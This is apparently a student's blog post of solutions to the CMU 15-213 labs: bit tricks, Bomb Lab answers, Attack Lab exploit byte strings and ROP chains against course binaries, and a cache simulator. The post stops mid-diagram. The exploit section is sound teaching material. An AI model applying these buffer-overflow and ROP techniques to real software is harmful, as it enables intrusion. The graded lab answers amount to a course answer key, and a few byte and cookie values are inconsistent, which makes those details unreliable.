Solutions to CMU 15213 Labs

This post is an archive for my personal solutions to the ten labs for the CMU 15213 course. You can access the self-study labs at the CSAPP official website.

Lab 1: Data Lab

This lab instructs you to write functions using bit-wise operations.

bixXor

Implements xor using only ~ and &. The key is to notice that x | y == ~(~x & ~y).

1
2
3
int bitXor(int x, int y) {
return ~(~(~x & y) & ~(x & ~y));
}

tmin

Returns the minimum two's complement integer.

1
2
3
int tmin(void) {
return 1 << 31;
}

isTmax

Checks if the input is the maximum two's complement integer. Notice that the maximum integer has a leading 0 and all remaining bits are 1.

1
2
3
int isTmax(int x) {
return !((x + 1) ^ ~x) & !!(x ^ ~0);
}

Another way to think the maximum integer is, it's the only number that equals to 0 when adding (1 << 31) + 1. So we can also use the following simpler code:

1
2
3
int isTmax(int x) {
return !(x + (1 << 31) + 1);
}

allOddBits

Checks if all odd index bits are set to 1. You can create a mask to detect the pattern.

1
2
3
4
5
int allOddBits(int x) {
int m = (0xAA << 8) + 0xAA;
m = (m << 16) + m;
return !(m ^ (m & x));
}

negate

Negates the input.

1
2
3
int negate(int x) {
return ~x + 1;
}

isAsciiDigit

Checks if the input is an ASCII digit, e.g., hex representation between 0x30 and 0x39. We can divide the pattern into the parts. The first part is 0x30, and the second is 0x0? where ? can be 0 to 9. When examining the second part, the least significant byte either does not exceed 1000 (0x8), or is exactly 0x8 or 0x9.

1
2
3
4
int isAsciiDigit(int x) {
int y = 0xF & x;
return !((0x30 ^ x) >> 4) & (!(0x8 & y) | !(0x8 ^ y) | !(0x9 ^ y));
}

conditional

Implements the conditional operator x ? x : y. Just use mask to achieve it.

1
2
3
4
int conditional(int x, int y, int z) {
int m = ~(!x) + 1;
return (~m & y) | (m & z);
}

isLessOrEqual

Checks if the first argument is less or equal than the second argument. You can use -x == ~x + 1 and examine the sign bit.

1
2
3
int isLessOrEqual(int x, int y) {
return !(((~x + 1) + y) >> 31);
}

logicalNeg

Implements the ! operator. That's, for any non-zero number, it returns 0 and for zero it returns 1. If the input is negative (the sign bit is 1), or the input added with -1 overflows then the input is non-zero.

1
2
3
int logicalNeg(int x) {
return (((x >> 31) ^ 0x1) & 0x1) & ((((x + (~1 + 1)) >> 31) ^ 0x0) & 0x1);
}

howManyBits

Returns the minimum number of bits required to represent the input integer. Note that a positive integer implies a leading 0 and a negative integer implies a leading 1. Therefore in either case, we must at least have a sign bit. We can safely invert all bits of a negative integer and from the most significant bit to the least significant bit find the index at which the bit is 1.

The trick here is to binary-search such index. To do this, we must create several masks, shown as in the following code. For example, Mask_16 = 0xFFFF0000 detects whether any of the most significant 16 bits is 1. If so, it means the result is at least 16. Then we can right shift the number 16 bits to recursively examine the most significant 16 bits by applying Mask_8 = 0xFF00.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
int howManyBits(int x) {
int ToPositive = x ^ (x >> 31);
int Mask_0 = 0x1;
int Mask_1 = 0x2;
int Mask_2 = 0xC;
int Mask_4 = 0xF0;
int Mask_8 = 0xFF << 8;
int Mask_16 = (Mask_8 | 0xFF) << 16;

int Count, Result = 1;
Count = !!(ToPositive & Mask_16) << 4;
Result += Count;
ToPositive = ToPositive >> Count;

Count = !!(ToPositive & Mask_8) << 3;
Result += Count;
ToPositive = ToPositive >> Count;

Count = !!(ToPositive & Mask_4) << 2;
Result += Count;
ToPositive = ToPositive >> Count;

Count = !!(ToPositive & Mask_2) << 1;
Result += Count;
ToPositive = ToPositive >> Count;

Count = !!(ToPositive & Mask_1);
Result += Count;
ToPositive = ToPositive >> Count;

Count = !!(ToPositive & Mask_0);
Result += Count;

return Result;
}

floatScale2

Returns 2*f where the input is interpreted as a floating-point number. You should be careful about the border cases. If the input number is NaN or infinity (i.e. the exponent is all ones), the function returns the input as required. If the input is denormalized (i.e. the exponent is all zeros), the input will be shifted left 1 bit. If it's normalized (i.e. the exponent is neither all zeros nor all zeros), we just add one to the exponent.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
unsigned floatScale2(unsigned uf) {
int MantissaMask = 0x7FFFFF, Mantissa = MantissaMask & uf;
int ExponentMask = 0xFF << 23, Exponent = ExponentMask & uf;
int Sign = (0x1 << 31) & uf;

int IsNaNOrInfinity = !(ExponentMask ^ Exponent);
int IsDenormalized = !(ExponentMask & Exponent);
if (IsNaNOrInfinity)
{
return uf;
}
else if (IsDenormalized)
{
int ExceptSign = uf << 1;
return Sign | ExceptSign;
}
else
{
int NewExponent = ExponentMask & (Exponent + (1 << 23));
return Sign | NewExponent | Mantissa;
}
}

floatFloat2Int

Returns bit-level equivalent of (int) x where x is interpreted as a floating number. Be aware of the border cases: (1) if the input is zero, the function also returns zero; (2) if the input is NaN or infinity, it returns 0x80000000u as required; (3) if the input is denormalized, it returns zero; (4) if the input is normalized, determine the result by checking the exponent.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
int floatFloat2Int(unsigned uf) {
int MantissaMask = 0x007FFFFF, Mantissa = MantissaMask & uf;
int ExponentMask = 0x7F800000, Exponent = ExponentMask & uf;
int SignMask = 0x80000000, Sign = SignMask & uf;

int Exp = (Exponent >> 23) - 127, Result, i, BitMask;

int IsNaNOrInfinity = !(ExponentMask ^ Exponent);
int IsDenormalized = !(ExponentMask & Exponent);
int IsNegative = !(SignMask ^ Sign);

// Is +0 or -0
if (!(uf << 1))
{
return 0;
}

// Is NaN or infinity.
if (IsNaNOrInfinity)
{
return 0x80000000u;
}

// Is denormalized
if (IsDenormalized)
{
return 0;
}

// Is normalized
if (Exp < 0)
{
return 0;
}
if (Exp >= 31)
{
return 0x80000000u;
}

Result = 1 << Exp;
Exp -= 1;
for (i = 22; i >= 0 && Exp >= 0; --i, --Exp)
{
BitMask = !!(Mantissa & (1 << i));
Result += BitMask * (1 << Exp);
}

if (IsNegative)
{
Result = -Result;
}

return Result;
}

floatPower2

Returns 2.0^x for any given integer x. The smallest non-zero floating (denormalized) number is 2^(-126+23)=2^(-149). So if the input is smaller than -149, the functions should return 0. The largest denormalized floating number in the form of 2.0^x is x^(-127). In the range of -149 and -127, we just left shift one by x+149. The smallest normalized number (also, in the form of 2.0^x) is 2^(-126) and the largest is 2^(254-127)=2^(127). In this case, we left shift x+127 by 23 to occupy the exponent part. If x exceeds 127, the function returns +INF.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
unsigned floatPower2(int x) {
if (x < -149)
{
return 0;
}
else if (x <= -127)
{
return 1 << (x + 149);
}
else if (x <= 127)
{
return (x + 127) << 23;
}
else // x > 127
{
return 0x7F800000;
}
}

Lab 2: Bomb Lab

The answers to the six phases are respectively:

1
2
3
4
5
6
Border relations with Canada have never been better.
1 2 4 8 16 32
0 207
7 0
iOnUvW
4 3 2 1 6 5

If we deciphered the secret phase, the answers will be (adding string DrEvil after the third line):

1
2
3
4
5
6
Border relations with Canada have never been better.
1 2 4 8 16 32
0 207
7 0 DrEvil
iOnUvW
4 3 2 1 6 5

Note that some of the answers are not unique. Let's quickly go through these phases.

Phase 1

Find the string at address 0x402400. You can use x/s 402400 to extract it!

Phase 2

The key to solve this phase is know the functionality of each register:

  • %rdi: the first argument.
  • %rsi: the second argument.
  • %rdx: the third argument.
  • %rcx: the forth argument.
  • %r8: the fifth argument.
  • %r9: the sixth argument.

More arguments are stored in stack. Know at which positions these arguments are stored in stack and you'll get the answer!

Phase 3

This function reads two integers and switches to the address accroding to the first integer. If the destination address has a value same as the second integer, the phase passes.

This phase has multiple answers. You can choose one of the followings:

  • 0 207
  • 1 311
  • 2 707
  • 3 256
  • 4 389
  • 5 206
  • 6 682
  • 7 327

Phase 4

The key is to decode func4(x, s, e) and understand it returns some numbers of steps to find x between [s, e] using binary search. s=0 and e=14. The function returns 0 if it finds x in the very first step. So x=7.

Phase 5

This phase executes the following steps:

  • The answer string length is 6.
  • Reads a string from 0x4024b0 and compares it to the string at 0x40245e, which is flyers.
  • The string at 0x4024b0 is maduiersnfotvbylSo you think you can stop the bomb with ctrl-c, do you?.
  • The indices respectively for f, l, y, e, r, s at 0x4024b0 is 9, 15, 14, 5, 6, 7. The hex representations are 9, f, e, 5, 6, 7.
  • Find in the ASCII table those characters whose low hex representation is 9, f, e, 5, 6 and 7. So there are multiple possible answers.

Phase 6

This is the most difficult phase (including the secret one), in terms of it's length of assembly... Be patient and take a careful look at the assembly. You'll find this phase does the following things:

  • It reads six integers and stores them in stack from the bottom up.
  • Each integer is different and all are smaller or equal than 6.
  • Subtracts each integer from 7. For example, 6 turns into 1.
  • According to the result integer, this function jumps to the target address from 0x6032d0 and reads the value. This value is also an address. The results are stored from %rsp+32 to %rsp+72, amounting to totally eight addresses.
  • Sets *(*(%rsp+t)+8)=*(%rsp+t+8), where t=32, 3a, 42, ..., 6a. For t=72, the target value is zero.
  • It actually implements a linked list, likely implemented as follows:
    1
    2
    3
    4
    struct node {
    int value;
    node* next;
    };
  • This linked list has a list of non-ascending values.
  • Find the indices in a non-ascending order and restore the input indices.

Secret Phase

Disassembling the phase_defused function and you will find a secret secret_phase function. This is the hidden phase of this lab. The secret_phase function does:

  • Receives an integer less or equal than 1001.
  • Calls function fun7(int* s, int x) and returns 2.
  • The fun7(int* s, int x) function receives a pointer s to a binary search tree node and finds value x in the tree.
  • Your goal is to find in this tree a value that returns 2, according to the calculation rules.

This binary search tree node looks like this:

1
2
3
4
5
6
7
8
9
         36
/ \
/ \
/ \
8 50
/ \ / \
6 22 45 100
/ \ / \ / \ / \
1 7 20 35 40 47 99 1001

Lab 3: Attack Lab

This lab asks you to construct exploits to have the function output specific strings. Before start, make sure to take a glance at the handout, which has detailed instructions for this lab. Remember to use -Og to compile the .s file and use objdump -d to generate byte codes.

Phase 1

In the getbuf() function, %rsp has an address of 0x5561dc78 and the return address is located at %rsp+0x28, which is 0x5561dca0. To call the touch1() function, you should set the return address as the address of touch1(), that is, 0x4017c0.

The input to ctarget is thus:

1
2
3
4
5
6
31 32 33 34 35 36 37 38
31 32 33 34 35 36 37 38
31 32 33 34 35 36 37 38
31 32 33 34 35 36 37 38
31 32 33 34 35 36 37 38
c0 17 40 00 00 00 00 00

The first 40 bytes are arbitrary except \n.

Phase 2

In this phase, you should put 0x591997fa into %rdi and jump to 0x4017ec to execute function touch2().

The first step is to write a .s file:

1
2
3
movq $0x59b997fa, %rdi
pushq $0x4017ec
ret

Then generate its byte codes:

1
2
3
48 c7 c7 fa 97 b9 59 // movq $0x59b997fa, %rdi
68 ec 17 40 00 // pushq $0x4017ec
c0 // ret

Write the input exploit file:

1
2
3
4
5
6
31 32 33 34 35 36 37 38
31 32 33 34 35 36 37 38
31 32 33 34 35 36 37 38
48 c7 c7 fa 97 b9 59 68 // Address 0x5561dc90, return here to execute instructions
ec 17 40 00 c3 00 00 00
90 dc 61 55 00 00 00 00 // Destination address

Phase 3

Note that in this phase, the content in the stack may be overwritten by function hexmatch(). So you must write the content in some high location of the stack.

The assembly code is:

1
2
3
movq $0x5561dca8, %rdi
pushq $0x4018fa
ret

The generated byte codes are:

1
2
3
48 c7 c7 a8 dc 61 55  // movq $0x5561dca8, %rdi
68 fa 18 40 00 // pushq $0x4018fa
c3 // ret

The input exploit is:

1
2
3
4
5
6
7
48 c7 c7 a8 dc 61 55 68 // Address 0x5561dc78
fa 18 40 00 c3 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
78 dc 61 55 00 00 00 00 // Destination address
35 39 62 39 39 37 66 61 // Address 0x5561dca8, string "59b997fa"

Phase 4

In this phase, you should construct two gadgets, one for moving data 0x59b997fa into some register like %rax, and the other one for moving %rax to %rdi as the argument into the function. Last, you should return to function touch2().

You can find a function which contains the desired byte codes and returns to that location. The first gadget uses the function addval_219 and the second function is setval_426. You can choose other functions if applicable.

1
2
3
4
5
6
7
8
9
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
ab 19 40 00 00 00 00 00 // Jump to middle of function addval_219 and perform pop
fa 97 b9 59 00 00 00 00 // cookie value 0x59b997fa, popped to %rax
c5 19 40 00 00 00 00 00 // Jump to middle of function setval_426 and perform mov %rax, %rdi
ec 17 40 00 00 00 00 00 // Return to touch2()

Here is a full list of decoded byte codes for all functions in farm.c. Use Ctrl+F to search the byte patterns you want.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
// 0x40199a: b8 fb 78 90 90 c3
unsigned getval_142()

// 0x4019a0: 8d 87 48 89 c7 c3 c3
unsigned addval_273(unsigned x)

// 0x4019a7: 8d 87 51 73 58 90 c3
unsigned addval_219(unsigned x)

// 0x4019ae: c7 07 48 89 c7 c7 c3
void setval_237(unsigned *p)

// 0x4019b5: c7 07 54 c2 58 92 c3
void setval_424(unsigned *p)

// 0x4019bc: c7 07 63 48 8d c7 c3
void setval_470(unsigned *p)

// 0x4019c3: c7 07 48 89 c7 90 c3
void setval_426(unsigned *p)

// 0x4019ca: b8 29 58 90 c3 c3
unsigned getval_280()

// 0x4019d6: 48 8d 04 37 c3
long add_xy(long x, long y)

// 0x4019db: b8 5c 89 c2 90 c3
unsigned getval_481()

// 0x4019e1: c7 07 99 d1 90 90 c3
void setval_296(unsigned *p)

// 0x4019e8: 8d 87 89 ce 78 c9 c3
unsigned addval_113(unsigned x)

// 0x4019ef: 8d 87 8d d1 20 db c3
unsigned addval_490(unsigned x)

// 0x4019f6: b8 89 d1 48 c0 c3
unsigned getval_226()

// 0x4019fc: c7 07 81 d1 84 c0 c3
void setval_384(unsigned *p)

// 0x401a03: 8d 87 41 48 89 e0 c3
unsigned addval_190(unsigned x)

// 0x401a0a: c7 07 88 c2 08 c9 c3
void setval_276(unsigned *p)

// 0x401a11: 8d 87 89 ce 90 90 c3
unsigned addval_436(unsigned x)

// 0x401a18: b8 48 89 e0 c1 c3
unsigned getval_345()

// 0x401a1e: 8d 87 89 c2 00 c9 c3
unsigned addval_479(unsigned x)

// 0x401a25: 8d 87 89 ce 38 c0 c3
unsigned addval_187(unsigned x)

// 0x401a2c: c7 07 81 ce 08 db c3
void setval_248(unsigned *p)

// 0x401a33: b8 89 d1 38 c9 c3
unsigned getval_159()

// 0x401a39: 8d 87 c8 89 e0 c3 c3
unsigned addval_110(unsigned x)

// 0x401a40: 8d 87 89 c2 84 c0 c3
unsigned addval_487(unsigned x)

// 0x401a47: 8d 87 48 89 e0 c7 c3
unsigned addval_201(unsigned x)

// 0x401a4e: b8 99 d1 08 d2 c3
unsigned getval_272()

// 0x401a54: b8 89 c2 c4 c9 c3
unsigned getval_155()

// 0x401a5a: c7 07 48 89 e0 91 c3
void setval_299(unsigned *p)

// 0x401a61: 8d 87 89 ce 92 c3 c3
unsigned addval_404(unsigned x)

// 0x401a68: b8 89 d1 08 db c3
unsigned getval_311()

// 0x401a6e: c7 07 89 d1 91 c3 c3
void setval_167(unsigned *p)

// 0x401a75: c7 07 81 c2 38 d2 c3
void setval_328(unsigned *p)

// 0x401a7c: c7 07 09 ce 08 c9 c3
void setval_450(unsigned *p)

// 0x401a83: 8d 87 08 89 e0 90 c3
unsigned addval_358(unsigned x)

// 0x401a8a: 8d 87 89 c2 c7 3c c3
unsigned addval_124(unsigned x)

// 0x401a91: b8 88 ce 20 c0 c3
unsigned getval_169()

// 0x401a97: c7 07 48 89 e0 c2 c3
void setval_181(unsigned *p)

// 0x401a9e: 8d 87 89 c2 60 d2 c3
unsigned addval_184(unsigned x)

// 0x401aa5: b8 8d ce 20 d2 c3
unsigned getval_472()

// 0x401aab: c7 07 48 89 e0 90 c3
void setval_350(unsigned *p)

Phase 5

Here is how you should think to solve this phase:

  • Function touch3(const char*) receives an address as the argument. So you should prepare an address value in %rdi.
  • This address value should come from %rsp. An intuitive way is use mov %rsp, %rax.
  • However, the cached %rsp value is not allowed to store the string value because it will be immediately transmitted to PC as the address of the next instruction. It must be a valid address.
  • farm.c provides a function add_xy(long, long). It can be leveraged to offset the value of %rsp.
  • The returned value of add_xy(long, long) is the address where the string is actually stored. It lies at the highest position of our input.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
06 1a 40 00 00 00 00 00 // mov %rsp, %rax
c5 19 40 00 00 00 00 00 // mov %rax, %rdi
ab 19 40 00 00 00 00 00 // pop %rax (0x48 is the offset)
48 00 00 00 00 00 00 00 // (popped offset)
42 1a 40 00 00 00 00 00 // movl %eax, %edx
69 1a 40 00 00 00 00 00 // movl %edx, %ecx
27 1a 40 00 00 00 00 00 // movl %ecx, %esi
d6 19 40 00 00 00 00 00 // call add_xy
c5 19 40 00 00 00 00 00 // mov %rax, %rdi
fa 18 40 00 00 00 00 00 // call touch3
35 39 62 39 39 37 66 61 // string "59b997fa"

Lab 4: Cache Lab

Make sure you read the handout before dong this lab.

Part A

Code for part A csim.c:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
#include <getopt.h>
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <ctype.h>
#include <stdbool.h>
#include <string.h>
#include "cachelab.h"

// Should avoid global variables. For simplicity here.
int hit_count = 0;
int miss_count = 0;
int eviction_count = 0;
int verbose = 0;
int help_msgs = 0;
int t = 0, s = 0, set_num = 0, E = 0, b = 0, block_size = 0;
unsigned long offset_mask = 0, set_mask = 0, check_mask = 0;

typedef struct lru_node lru_node_t;
struct lru_node {
int line_number;
lru_node_t* next;
};

typedef struct cache_line {
unsigned long check_bits;
char* p_block;
bool valid;
} cache_line_t;

typedef struct operation_line {
unsigned long address;
int data_size;
char op;
} operation_line_t;

void print_help_msgs()
{
printf("Usage: ./csim [hv] -s <num> -E <num> -b <num> -t <file>\n");
printf("Options:\n");
printf(" -h Print this help message.\n");
printf(" -v Optional verbose flag.\n");
printf(" -s <num> Number of set index bits.\n");
printf(" -E <num> Number of lines per set.\n");
printf(" -b <num> Number of block offset bits.\n");
printf(" -t <file> Trace file.\n\n");
printf("Examples:\n");
printf(" linux> ./csim -s 4 -E 1 -b 4 -t traces/yi.trace\n");
printf(" linux> ./csim -v -s 8 -E 2 -b 4 -t traces/yi.trace\n");
}

operation_line_t parse_line(char* line)
{
operation_line_t operation_line;

int start_index, end_index;
char str_address[128];
char str_size[16];
char* end = NULL;

if(line[0] == 'I')
{
operation_line.op = 'I';
}
else
{
operation_line.op = line[1];

start_index = end_index = 3;
while (line[end_index] != ',')
{
++end_index;
}
strncpy(str_address, line + start_index, end_index - start_index);
str_address[end_index - start_index] = '\0';
operation_line.address = strtoul(str_address, &end, 16);

start_index = end_index + 1;
end_index = start_index + 1;
while (isdigit(line[end_index]))
{
++end_index;
}
strncpy(str_size, line + start_index, end_index - start_index);
str_size[end_index - start_index] = '\0';
operation_line.data_size = atoi(str_size);
}

return operation_line;
}

int find_lru_index(lru_node_t* root)
{
while (root->next != NULL)
{
root = root->next;
}

return root->line_number;
}

lru_node_t* create_node(lru_node_t* root, int used_index)
{
lru_node_t* new_node = malloc(sizeof(lru_node_t));
new_node->line_number = used_index;
new_node->next = root->next;
root->next = new_node;

return new_node;
}

lru_node_t* find_node_with_index(lru_node_t* root, int used_index, lru_node_t** prev_node)
{
// Start with the real rool node
root = root->next;

while (root != NULL)
{
if (root->line_number == used_index)
{
break;
}
else
{
*prev_node = root;
root = root->next;
}
}

return root;
}

void update_lru_node(lru_node_t* root, int used_index)
{
if (root == NULL)
{
create_node(root, used_index);
return;
}

// 1). Don't forget to set the previous node's next
lru_node_t* prev_node = NULL;
lru_node_t* found_node = find_node_with_index(root, used_index, &prev_node);
if (found_node != NULL)
{
if (prev_node != NULL)
{
prev_node->next = found_node->next;
}
// 2). Be careful when root's next is the found node
found_node->next = (root->next == found_node ? found_node->next : root->next);
root->next = found_node;
}
else
{
create_node(root, used_index);
}
}

void cache_operation(operation_line_t* operation, char* line, cache_line_t** cache_decay, lru_node_t* lru_roots)
{
line[strlen(line) - 1] = '\0';

char op = operation->op;
unsigned long address = operation->address;
int set = (address & set_mask) >> b;
unsigned long check = ((address & check_mask) >> (s + b)) & ((1 << (s + b)) - 1);

cache_line_t (*cache)[E] = (cache_line_t(*)[E]) cache_decay;
cache_line_t* cache_set = cache[set];

bool b_hit = false;
int placement_or_hit_index = -1;
for (int i = 0; i < E; ++i)
{
// Cache hit
if (cache_set[i].valid && cache_set[i].check_bits == check)
{
if (op == 'M')
{
if (verbose) {
printf("%s hit hit\n", line);
}
hit_count += 2;
}
else
{
if (verbose) {
printf("%s hit\n", line);
}
++hit_count;
}

placement_or_hit_index = i;
b_hit = true;
break;
}
// Empty line
else if (!cache_set[i].valid)
{
placement_or_hit_index = i;
}
}

// Cache miss, do placement or eviction
if (!b_hit)
{
// Has empty line, do placement
if (placement_or_hit_index != -1)
{
cache_set[placement_or_hit_index].valid = true;
cache_set[placement_or_hit_index].check_bits = check;

if (op == 'M')
{
if (verbose) {
printf("%s miss hit\n", line);
}
++miss_count;
++hit_count;
}
else
{
if (verbose) {
printf("%s miss\n", line);
}
++miss_count;
}
}
// All lines are occupied, do eviction
else
{
placement_or_hit_index = find_lru_index(&lru_roots[set]);
cache_set[placement_or_hit_index].check_bits = check;

if (op == 'M')
{
if (verbose) {
printf("%s miss eviction hit\n", line);
}
++miss_count;
++eviction_count;
++hit_count;
}
else
{
if (verbose) {
printf("%s miss eviction\n", line);
}
++miss_count;
++eviction_count;
}
}
}

update_lru_node(&lru_roots[set], placement_or_hit_index);
}

int main(int argc, char* argv[])
{
// Parse input arguments
int opt;
char* trace_file;

while ((opt = getopt(argc, argv, "hvs:E:b:t:")) != -1) {
switch (opt) {
case 'h':
help_msgs = 1;
break;
case 'v':
verbose = 1;
break;
case 's':
s = atoi(optarg);
set_num = 1 << s;
break;
case 'E':
E = atoi(optarg);
break;
case 'b':
b = atoi(optarg);
block_size = 1 << b;
break;
case 't':
trace_file = optarg;
break;
default:
printf("Invalid arguments!");
break;
}
}

if (help_msgs)
{
print_help_msgs();
return 0;
}

if (s <= 0 || E <= 0 || b <= 0)
{
printf("Invalid argument values!\n");
return 0;
}

// Compute other global variables
t = 64 - s - b;
offset_mask = (1 << b) - 1;
set_mask = (1 << (s + b)) - 1 - offset_mask;
check_mask = -(1 << (s + b));

// Allocate memory for cache
lru_node_t* lru_roots = calloc(set_num, sizeof(lru_node_t));
cache_line_t (*cache)[E] = calloc(set_num, sizeof(cache_line_t) * E);
char* p_cache_space = malloc(block_size * set_num * E);

for(int i = 0; i < set_num; ++i)
for(int j = 0; j < E; ++j)
{
cache[i][j].p_block = p_cache_space + i * (block_size * E) + j * block_size;
}

// Read file and process by line
FILE* file = fopen(trace_file, "r");
if (file == NULL)
{
printf("Cannot open file %s\n", trace_file);
return 0;
}

char line[128];
while (fgets(line, 128, file))
{
operation_line_t operation = parse_line(line);

switch (operation.op)
{
case 'L':
case 'S':
case 'M':
cache_operation(&operation, line, (cache_line_t**)cache, lru_roots);
break;
default:
break;
}
}

// Print summary and clean up memory
printSummary(hit_count, miss_count, eviction_count);
free(cache);
free(p_cache_space);
return 0;
}

One thing you should be very careful about is when we update the LRU linked list. By the way, I was wondering if there is a simpler method to implement LRU? Linked list seems to result in memory and time overhead.

Part B

This the the hardest one so far! But take it easy and think about it step by step.

For a given 32*32 matrix, each row of it has four sequential blocks in cache because each cache block contains 8 integers (32 bytes) and each row of the matrix has 4 sets of 8 integers. The cache layout for the matrix is shown as below:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
 -------------------
| 0 | 1 | 2 | 3 | row 1
-------------------
| 4 | 5 | 6 | 7 | row 2
-------------------
| 8 | 9 | 10 | 11 | row 3
-------------------
| 12 | 13 | 14 | 15 | row 4
-------------------
| 16 | 17 | 18 | 19 | row 5
-------------------
| 20 | 21 | 22 | 23 | row 6
-------------------
| 24 | 25 | 26 | 27 | row 7
-------------------
| 28 | 29 | 30 | 31 | row 8
-------------------
| 0 | 1 | 2 | 3 | row 9
-------------------
| 4 | 5 | 6 | 7 | row 10
-------------------
| 8 | 9 | 10 | 11 | row 11
-------------------
| 12 | 13 | 14 | 15 | row 12
-------------------
| 16 | 17 | 18 | 19 | row 13
-------------------
| 20 | 21 | 22 | 23 | row 14
-------------------
| 24 | 25 | 26 | 27 | row 15
-------------------
| 28 | 29 | 30 | 31 | row 16
-------------------
| 0 | 1 | 2 | 3 | row 17
-------------------
| 4 | 5 | 6 | 7 | row 18
-------------------
| 8 | 9 | 10 | 11 | row 19
-------------------
| 12 | 13 | 14 | 15 | row 20
-------------------
| 16 | 17 | 18 | 19 | row 21
-------------------
| 20 | 21 | 22 | 23 | row 22
-------------------
| 24 | 25 | 26 | 27 | row 23
-------------------
| 28 | 29 | 30 | 31 | row 24
-------------------
| 0 | 1 | 2 | 3 | row 25
-------------------
| 4 | 5 | 6 | 7 | row 26
-------------------
| 8 | 9 | 10 | 11 | row 27
-------------------
| 12 | 13 | 14 | 15 | row 28
-------------------
| 16 | 17 | 18 | 19 | row 29
-------------------
| 20 | 21 | 22 | 23 | row 30
-------------------
| 24 | 25 | 26 | 27 | row 31
-------------------
| 28 | 29 | 30 | 31 | row 32
-------------------

Each block has 8 integers (32 bytes). You can see that this pattern repeats every 8 rows. So, it we use 8*8 blocking to partition this matrix, the number of misses will amount to 32*32/(8*8)*8*2=256 times (32*32/(8*8) blockings for a single matrix, each blocking produces 8 misses and two matrices).

But when adopt 8*8 blocking, the result will be 344 misses! Why is that? We can guess it's because matrix overwrites some of the caches for matrix !

To validate our assumption, we can print the addresses of and . Add printf("%p %p\n", A, B); in tracegen.c and see their addresses:

1
0x59010cdbb0c0 0x59010cdfb0c0

Note that your result may differ from mine. Recall that in the problem settings s=b=5. The addresses of and have the same lowest 16 bits. This means matrix has the same cache layout pattern as matrix . When we read the first element of , the first block will be loaded; when we read the first element of , it overwrites the block just loaded from !

With that being said, reading and writing it to causes two cache misses! The first is a cold miss which we cannot avoid, but the second is a conflict miss but it's hard to avoid.

Again, reading and writing it to also cases two misses. The first is a conflict miss with the block from . The second is a cold miss.

We do not want the conflict miss that takes place when reading . This miss happens when the cache will be overwritten by the block of . What if we do not need to update the cache? In other words, the cache always stores data from matrix . To this end, we can make use of local variables to store one block of integers from matrix . Tne cache will only get updated when we first load data into local variables. Later, the cache will be overwritten by matrix and will keep as it is.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
void transpose_submit(int M, int N, int A[N][M], B[M][N])
{
if (M == 32 && N == 32)
{
int i, j, block_i, block_j;
int Temp[8];

for (i = 0; i < N; i += 8)
for (j = 0; j < M; j += 8)
for (block_i = i; block_i < i + 8; ++block_i) {
// Load current block of A into local variables
for (block_j = j; block_j < j + 8; ++block_j) {
Temp[block_j - j] = A[block_i][block_j];
}
// Write from locals into B
for (block_j = j; block_j < j + 8; ++block_j) {
B[block_j][block_i] = Temp[block_j - j];
}
}
}
else if (M == 64 && N == 64)
{

}
else
{

}
}

This time we get 290 misses! Full score!

The key idea here is to improve temporal locality as much as possible. To improve temporal locality, we need to try to visit data within a cache block within as much as we can. Blocking helps with this. On the other side, we must reduce the number of times of cache overwriting. Local variables help with this.

Unfortunately, when we have M=N=64 using the same code, the number of cache misses is... 4614. What the f is going on? Well, let's revist the cache layout pattern for a 64*64 matrix.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
 ---------------------------------------
